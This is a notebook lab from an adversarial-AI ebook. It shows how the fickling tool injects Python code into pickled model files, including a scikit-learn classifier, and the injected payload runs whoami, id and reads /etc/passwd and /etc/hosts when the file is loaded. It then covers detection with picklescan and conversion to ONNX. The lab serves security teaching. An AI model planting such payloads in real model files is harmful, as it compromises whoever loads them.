<img style="max-width:20em; height:auto;" src="../graphics/A-Little-Book-on-Adversarial-AI-Cover.png"/>

Author: Nik Alleyne   
Author Blog: https://www.securitynik.com   
Author GitHub: github.com/securitynik   

Author Other Books: [   

            "https://www.amazon.ca/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458/",   
            
            "https://www.amazon.ca/Learning-Practicing-Mastering-Network-Forensics/dp/1775383024/"   
        ]   


This notebook ***(fickling.ipynb)*** is part of the series of notebooks From ***A Little Book on Adversarial AI***  A free ebook released by Nik Alleyne

### Fickling Introduction  

### Lab Objectives:   
- Learn about pickle format   
- Learn about pickeltools 
- Learn about fickling   
- Learn how to modify a model pickle file   

### Step 1:  
Laying the foundation   

In [1]:
# Import the needed libraries needed for this section
import pickle
import pickletools
from fickling.fickle import Pickled

In [2]:
# Let's understand the problem before taking advantage of it
# Create a simple variable named welcome
welcome = 'Welcome to A Little Book on Adversarial AI'
print(welcome)
print(f'Len of welcome: {len(welcome)}')

Welcome to A Little Book on Adversarial AI
Len of welcome: 42


In [3]:
# Create a path for the file
pickle_file = r'/tmp/adversarial_ai_test.pkl'
pickle_file

'/tmp/adversarial_ai_test.pkl'

In [4]:
# set up the file pointer to a file on the disk 
# We will **write** the binary information
with open(file=pickle_file, mode='wb') as fp:
    # Save the file to disk
    # Use the highest version of pickle protocol
    # Currently version 5 as of this writing
    pickle.dump(obj=welcome, file=fp, protocol=pickle.HIGHEST_PROTOCOL)

# Verify the file was created
# Notice the "!" below, allows us to run external commands inside of 
# this notebook

!ls {pickle_file}

# Get the MD5 hash of the file we just created
!md5sum {pickle_file}

/tmp/adversarial_ai_test.pkl
cf8ee794c9f190277bb996a676ab4335  /tmp/adversarial_ai_test.pkl


### Step 2:   
Disassembling the pickle file   

In [5]:
# If we look at the file on the disk, 
# using XXD (hexeditor) this is what we see
!xxd {pickle_file}

00000000: 8005 952e 0000 0000 0000 008c 2a57 656c  ............*Wel
00000010: 636f 6d65 2074 6f20 4120 4c69 7474 6c65  come to A Little
00000020: 2042 6f6f 6b20 6f6e 2041 6476 6572 7361   Book on Adversa
00000030: 7269 616c 2041 4994 2e                   rial AI..


In [6]:
# Does not look like much above, let us disassemble it
# This time open the file in **read** mode
with open(file=pickle_file, mode='rb') as fp:
    # retrieve the file from disk.
    # Pickertools allows us to read pickle files, 
    # without executing any code
    pickletools.dis(pickle=fp)

    0: \x80 PROTO      5
    2: \x95 FRAME      46
   11: \x8c SHORT_BINUNICODE 'Welcome to A Little Book on Adversarial AI'
   55: \x94 MEMOIZE    (as 0)
   56: .    STOP
highest protocol among opcodes = 4


Using **pickletools** we were able to disassemble the pickle file we created earlier.  
Immediately line 11, stands out as it represents the string we entered.   The *SHORT_BINUNICODE* is used to push a short unicode string that is less than 256 bytes unto the pickle stack  


What are the other items though?

- 0: \x80 PROTO      5 -> Remember above we specified *.HIGHEST_PROTOCOL* and we stated that version is currently 5. This is the result of that.    
- FRAME      46 -> Tells us that the size of our data is 46 bytes long. At this point len(welcome) is 42 bytes, so if you are wondering why 46 and not 42, it is because this 46 represents everything coming beyond this frame. Think of it as the full payload coming after the frame. 
Our SHORT_BINUNICODE: 1 byte   
Prefix length: 1 byte   
Our actual string: 42 bytes  
MEMOIZE: 1 Byte   
. STOP: 1 byte 
We add them all together and we get 1 + 1 + 42 + 1 + 1 = 42 bytes  

54: \x94 MEMOIZE    (as 0) -> Saves the object into the internal "memo" table   
55: .    STOP -> This is the end of the pickle stream.  

We are not here to perform disassembly but it is nice that we are able to interpret the output :-D 

### Step 3:   
Testing the stolen model   

In [7]:
# Let us assume we stole the model file
with open(file=pickle_file, mode='rb') as fp:
    # read the model into a variable
    stolen_model = Pickled.load(pickled=fp)
stolen_model

In [8]:
# Now that we have the stolen_model file
# Let us be the attacker.
# Setup some *malicious* code

# Let's now add this *malicious* code
stolen_model.insert_python_exec('print("You have been PWNED!! BY SECURITYNIK Adversarial AI")')

7

In [9]:
# Let's now put the model back on the file system
# We will just use a separate file so we have something to compare
# In the real world, we would overwrite the existing model 
with open(file=r'/tmp/adversarial_ai_test_pwnd.pkl', mode='wb') as fp:
    # read the model into a variable
    stolen_model.dump(file=fp)

# We should see clearly below, the file has been modified
# This can be recognized by the fact that the hash changed
!ls /tmp/adversarial_ai_test_pwnd.pkl
!md5sum /tmp/adversarial_ai_test_pwnd.pkl

/tmp/adversarial_ai_test_pwnd.pkl
9bfcc24360bd654a7bdc8df79ca7c9a2  /tmp/adversarial_ai_test_pwnd.pkl


Write away if you compare the hashes of the two files, you should see a problem.    

/tmp/adversarial_ai_test.pkl     
cf8ee794c9f190277bb996a676ab4335    /tmp/adversarial_ai_test.pkl     

/tmp/adversarial_ai_test_pwnd.pkl   
9bfcc24360bd654a7bdc8df79ca7c9a2    /tmp/adversarial_ai_test_pwnd.pkl    

The fact that the two hashes are different suggest the original file has been changed, thus impacting its integrity.   

We know the file has changed but Can our malicious code be run also?   

In [10]:
# Open the file that we assume is legit
# Notice the mode = 'rb'. 
# This means we are reading the file in binary format
with open(file=pickle_file, mode='rb') as fp:
    # read the model into a variable
    trusted_model = pickle.load(file=fp)

# When we look at the trusted_model or the results returned from the load, 
# we see ...
trusted_model

'Welcome to A Little Book on Adversarial AI'

### Validate this with load_model.py
You can also validate that this works outside of the notebook by running the load_model.py script.  

Open a command prompt and go to the director where your **labs** are 
cd /path/to/labs    

Once in there the script usage is:
$ **python load_model.py --model /tmp/adversarial_ai_test.pkl**   

Compare with the pwnd file,  
$ **python load_model.py --model /tmp/adversarial_ai_test_pwnd.pkl**    



### Step 4:   
Building on the base knowledge   
- Let us now target an simple scikit-learn model  

In [11]:
# Import Iris dataset
from sklearn.datasets import load_iris
import numpy as np
import pickle
from fickling.fickle import Pickled

In [12]:
# With this understanding, let's build a machine learning model, using the Iris dataset
# The This models objective is to predict the flower type

# Use sklearn's Iris toy dataset
# Remember, we are not concerned about the data for the model
# We are only concern with attacking the model   
# This network will consist of 4 features. Each column represents a feature
X, y = load_iris(return_X_y=True, as_frame=False)

# Combine the X and y
X_y = np.c_[X, y]

# Shuffle the data
np.random.seed(10)
np.random.shuffle(X_y)

# Split the data into X and y again
X, y = X_y[:, :-1], X_y[:, -1]

# Below we see a snapshot of X with 3 columns
print(f'This is the first 10 samples/rows from X: \nConsider these X1, X2 and X3\n\n{X[:10]} ')

# Each X has an associated target/label/true value y. 
# The labels are 0 and 1, hence this is a binary classification problem
print(f'\nThis is the first 10 labels y matching with each row in X: \n{y[:10]} ')

This is the first 10 samples/rows from X: 
Consider these X1, X2 and X3

[[6.3 2.3 4.4 1.3]
 [6.4 2.7 5.3 1.9]
 [5.4 3.7 1.5 0.2]
 [6.1 3.  4.6 1.4]
 [5.  3.3 1.4 0.2]
 [5.  2.  3.5 1. ]
 [6.3 2.5 4.9 1.5]
 [5.8 2.7 4.1 1. ]
 [5.1 3.4 1.5 0.2]
 [5.7 2.8 4.5 1.3]] 

This is the first 10 labels y matching with each row in X: 
[1. 2. 0. 1. 0. 1. 1. 1. 0. 1.] 


In [13]:
# Extract the target names also
# These are the classes that the model needs to predict
# Once again, not that important for the problem we are trying to solve
iris_classes = load_iris()['target_names']
iris_classes

array(['setosa', 'versicolor', 'virginica'], dtype='<U10')

In [14]:
# Import the Random Forest Algorithm
# Random Fores was a choice, nothing special about this choice
# The objective is to show we can alter the models
# No concerns about the algorithm

from sklearn.ensemble import RandomForestClassifier

In [15]:
# Instantiate the class with 100 decision trees
r_forest = RandomForestClassifier(n_estimators=100, criterion='gini', random_state=10)

# Fit the model
r_forest.fit(X=X, y=y)

,n_estimators,100
,criterion,'gini'
,max_depth,None
,min_samples_split,2
,min_samples_leaf,1
,min_weight_fraction_leaf,0.0
,max_features,'sqrt'
,max_leaf_nodes,None
,min_impurity_decrease,0.0
,bootstrap,True
,oob_score,False


In [16]:
# With the fitted model, let's make a prediction on of the samples
# No need to worry about using a different sample here for testing
# The objective is not to validate the model's performance
# but instead to compromise the model
r_forest.predict(X[:1])

array([1.])

In [17]:
# Let us look at the probabilities of this
r_forest.predict_proba(X[:1])

array([[0.  , 0.98, 0.02]])

In [18]:
# Let's grab the index position with the highest value
# Above, we see the highest value in in index position 1 -> 0.99
# Let us look at the probabilities of this
np.argmax(r_forest.predict_proba(X[:1]))

np.int64(1)

In [19]:
# What is 1 associated with? 
# let us plug the information above back into the labels
# This tells us that our sample is a versicolor
iris_classes[np.argmax(r_forest.predict_proba(X[:1]))].item()

'versicolor'

So we have a model that works and we know how that it could be deployed if needed. Let us make this a bit more real.   

In [20]:
# Setup the file path for the legit file
r_forest_path = '/tmp/r_forest_legit.pkl'

# Now that we know we can use the model as expected, lets save the model
with open(file=r_forest_path, mode='wb') as rf_forest_legit:
    pickle.dump(obj=r_forest, file=rf_forest_legit)

# Verify the file has been created
!ls  {r_forest_path}

# Validate the integrity of the file by getting its hash
!md5sum {r_forest_path}

/tmp/r_forest_legit.pkl
b9f991b9fa200add9db68f17233e6e21  /tmp/r_forest_legit.pkl


In [21]:
# Let us exploit this legit model
# Assuming we stole the model after compromising the environment
# Or through some other means
with open(file=r_forest_path, mode='rb') as legit_file:
    stolen_model = Pickled.load(pickled=legit_file)

stolen_model

In [22]:
'''
Setup our malicious code
We are leveraging the os.system() module here.
We can use any function that allows us to interact with the OS and we will use other techniques later
This is not inserted in the model as yet and is only used for us to understand the input that will be injected
This code just performs some basic reconnaissance on the host loading the model
'''

MALICIOUS_CODE = """
print('Performing reconnaissance ...')
import os
os.system('whoami')
os.system('id')

# could even chain these commands also via os.system()
os.system('cat /etc/hosts;cat /etc/passwd')

print('Reconnaissance completed!')
"""

# Run this if you wish to see the code before injecting
# Here we are using exec to call the code above
exec(MALICIOUS_CODE)

Performing reconnaissance ...
securitynik
uid=1000(securitynik) gid=1000(securitynik) groups=1000(securitynik),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users)
# This file was automatically generated by WSL. To stop automatic generation of this file, add the following entry to /etc/wsl.conf:
# [network]
# generateHosts = false
127.0.0.1	localhost
127.0.1.1	SECURITYNIK-G14.	SECURITYNIK-G14

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/

In [23]:
'''
Let us insert our malicious code into the actual model
Finish up this
While you would like to use the MALICIOUS_CODE variable above
It will not work in this circumstance
let's copy and paste the raw code
The variable would work in the notebook but not outside of it
We want to ensure our code is reliable both insdide 
'''

# This is the same code as in MALICIOUS_CODE above
# Maybe we should encode this in one way or another. 
# Maybe we will do this later :-D 
stolen_model.insert_python_exec("""exec("print('Performing reconnaissance ...');import os;os.system('whoami');os.system('id');os.system('cat /etc/hosts;cat /etc/passwd');print('Reconnaissance completed!')")""")

7

In [24]:
# Assuming that we did everything correctly
# Let us save the compromised model
# First save a file for the recon information
with open(file=r'/tmp/recon.txt', mode='wb') as recon_file:
    with open(file=r_forest_path, mode='wb') as legit_file:

        # Write the file back to disk
        stolen_model.dump(legit_file)


In [25]:
# Now assuming that we did everything correctly above, 
# when the user loads the model
# The note on performing reconnaissance is just for us. 
# We would not share it with the users
with open(file=r_forest_path, mode='rb') as legit_file:

        # Load the trusted_model
        trusted_model = pickle.load(file=legit_file)

Performing reconnaissance ...
securitynik
uid=1000(securitynik) gid=1000(securitynik) groups=1000(securitynik),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users)
# This file was automatically generated by WSL. To stop automatic generation of this file, add the following entry to /etc/wsl.conf:
# [network]
# generateHosts = false
127.0.0.1	localhost
127.0.1.1	SECURITYNIK-G14.	SECURITYNIK-G14

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/

### Validate this with load_model.py
You can also validate that this works outside of the notebook by running the load_model.py script.    

Look at the contents in the recon file:   
$ cat /tmp/recon.txt

The script usage is python:
$ python load_model.py --model /tmp/r_forest_legit.pkl     

You should see similar results as above on your console   

### Step 5:  
Detecting this activity   

In [26]:
# Import Picklescan library
# https://github.com/mmaitre314/picklescan
import picklescan.scanner as pk_scanner

In [27]:
# Can the compromised model make predictions?
# Let us find out
trusted_model.predict(X[:1])

array([1.])

So what we should have done was was to validate the model before loading it up and making any predictions. Let us do that.  

We arleady saw in lab: **hash_enc_logging.ipynb** how we can leverage encryption, hashing and logging to ensure we are able to detect possible compromises sooner. 

The tool we are using here is **picklescan**. While this tool provides a helpful first step, it is not a panacea. For example, researchers were able to bypass this tool, as it relied on a known blocklist: https://github.com/mmaitre314/picklescan/blob/main/src/picklescan/scanner.py#L88  . The bypass occurred using built in Python libraries and third party libraries such as Pandas. 


In [28]:
# https://github.com/mmaitre314/picklescan
# Picklescan

# We can see below the pickle is reporting that builtins exec was found
# If we remember, above, we did use exec command.

!picklescan --path  /tmp/r_forest_legit.pkl

/tmp/r_forest_legit.pkl: dangerous import 'builtins exec' FOUND
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 1
Dangerous globals: 1


In [29]:
print(pk_scanner.scan_file_path(path=f'{r_forest_path}'))

ScanResult(globals=[Global(module='numpy', name='dtype', safety=<SafetyLevel.Innocuous: 'innocuous'>), Global(module='sklearn.tree._classes', name='DecisionTreeClassifier', safety=<SafetyLevel.Suspicious: 'suspicious'>), Global(module='numpy._core.multiarray', name='scalar', safety=<SafetyLevel.Suspicious: 'suspicious'>), Global(module='numpy', name='ndarray', safety=<SafetyLevel.Innocuous: 'innocuous'>), Global(module='sklearn.ensemble._forest', name='RandomForestClassifier', safety=<SafetyLevel.Suspicious: 'suspicious'>), Global(module='builtins', name='exec', safety=<SafetyLevel.Dangerous: 'dangerous'>), Global(module='numpy._core.multiarray', name='_reconstruct', safety=<SafetyLevel.Innocuous: 'innocuous'>), Global(module='sklearn.tree._tree', name='Tree', safety=<SafetyLevel.Suspicious: 'suspicious'>)], scanned_files=1, issues_count=1, infected_files=1, scan_err=False)


In [30]:
# Generally we don't wish to use only one tool. 
# Let's introduce modelscan from TrustedAI
# https://github.com/protectai/modelscan
# We see below that it is reporting one critical issue and 
# we also see the note about **exec**
!modelscan -p  {r_forest_path}

/bin/bash: line 1: modelscan: command not found


In [31]:
# We can also disassemble the pickle file
# Just as we did earlier above
# This can take a while so either uncomment it or prepare to interrupt
#!fickling --trace /tmp/r_forest_legit.pkl

### Step 6:   

We know now what we should do to ensure any models we download from the internet is somewhat trusted.   
Rather than saving the file as pickel, let's switch the file format to the Open Neural Network Exchange (ONNX) format: You can learn more about ONNX here:  https://onnx.ai/

In [32]:
# There we go. We will able to compromise the model using the fickling technique 
# How do we mitigate this
# Let's save the model as a SafeTensor instead of using the Pickle format
# https://huggingface.co/docs/safetensors/api/numpy
# https://scikit-learn.org/stable/model_persistence.html


# Safe Tensors does not seem to be a fit here for persistence
# Problem here is the original model format is lost
from skl2onnx import to_onnx

In [33]:
# Convert the r_forest classifier to onnx format
r_forest_onnx = to_onnx(model=r_forest, X=X, name='r_forest_secured_model')

r_forest_onnx_path = r'/tmp/r_forest.onnx'
# Save the file
with open(file=r_forest_onnx_path, mode='wb') as fp:
    fp.write(r_forest_onnx.SerializeToString())

# Confirm the file
!ls {r_forest_onnx_path}

/tmp/r_forest.onnx


In [34]:
# Load the model
# Keep in mind the original model format is lost
from onnxruntime import InferenceSession

In [35]:
# This is currently considered the most secure option for storing scikit-learn models
# However, based on research done by HiddenLayer, you may still be able to run arbitrary code in ONNX model format
# See this link: https://hiddenlayer.com/innovation-hub/weaponizing-machine-learning-models-with-ransomware/
# The training and serving environments are independent of each other

# Unfortunately, not all scikit-learn models are currently supported
# Most importantly, the original Python object is loaded and 
# cannot be reconstructed

with open(file=r_forest_onnx_path, mode='rb') as fp:
    loaded_r_forest_onnx = fp.read()

r_forest_inference_sess = InferenceSession(path_or_bytes=loaded_r_forest_onnx, providers=["CPUExecutionProvider"])

# Make a prediction on a sample
# Below we see the class as well as the confidence for each class
r_forest_inference_sess.run(None, {'X' : [[5,3,2,1]]})[0]

array([0], dtype=int64)

### Lab Takeaways:   
- We learnt about the pickle format 
- We saw how arbritary code can be written to the model file   
- We learnt about the ONNX format   


### Additional References:   
- https://blog.trailofbits.com/2024/03/04/relishing-new-fickling-features-for-securing-ml-systems/     
- https://peps.python.org/pep-3154/   